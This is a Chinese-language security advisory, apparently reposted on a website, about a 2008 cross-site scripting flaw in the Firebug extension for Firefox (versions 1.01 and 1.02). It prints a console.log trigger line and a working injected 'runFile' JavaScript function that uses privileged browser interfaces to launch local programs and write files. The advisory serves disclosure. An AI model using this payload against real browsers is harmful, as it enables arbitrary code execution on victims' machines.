Firefox插件FireBug跨站脚本执行漏洞

2008-02-23 07:15:38来源:互联网 阅读 ()

新老客户大回馈,云服务器低至5折

受影响系统

Parakey Inc. Firebug 1.02

Parakey Inc. Firebug 1.01

不受影响系统

Parakey Inc. Firebug 1.03

描述

BUGTRAQ ID: 23315

FireBug是一个非常实用的JavaScript以及DOM查看调试工具,是Firefox的一个插件。FireBug的对脚本代码的处理实现上存在漏洞,远程攻击者可能利用此漏洞在用户机器上执行恶意脚本代码。

在浏览器中远程脚本是受到沙盒限制的,也就是任何http:或https:前缀的URL都是安全的。浏览器扩展使用chrome: protocol,这个协议不受任何限制,因此浏览器扩展都是受信任的。如果远程脚本诱骗浏览器对chrome:执行JavaScript表达式的话,这个脚本就可以完全控制整个chrome及操作系统,因为命令执行和读写访问都是允许的。

如果要导致Firebug执行跨站脚本,可执行以下操作:

console.log({’ ’:’exploit’})

如果将这段JavaScript表达式嵌入到页面并使用安装了Firebug的浏览器打开,用户就会得到一个警告窗,这时攻击者可以向浏览器chrome中注入以下函数:

function runFile(f) { 

var file = Components.classes["@mozilla.org/file/local;1"] 

.createInstance(Components.interfaces.nsILocalFile); 

file.initWithPath(f); 

var process = Components.classes[



"@mozilla.org/process/util;1"] 

.createInstance(Components.interfaces.nsIProcess); 

process.init(file); 

var argv = Array.prototype.slice.call(arguments, 1); 

process.run(true, argv, argv.length); 

}

runFile函数允许执行文件。通过浏览器chrome中的函数声明,攻击者就可以多次调用console.log以生成任意文件,甚至暗中安装浏览器扩展,以及读写文件。

关键词:
【推荐给好友】【关闭】
最新五条评论
查看全部评论
评论总数 0 条
您的评论
用户名: 新注册) 密 码: 匿名:
·用户发表意见仅代表其个人意见,并且承担一切因发表内容引起的纠纷和责任
·本站管理人员有权在不通知用户的情况下删除不符合规定的评论信息或留做证据
·请客观的评价您所看到的资讯,提倡就事论事,杜绝漫骂和人身攻击等不文明行为

标签:

版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有

上一篇:嚣张!男孩网络公开病毒制造全过程

下一篇:做自己的救世主--系统安全保卫战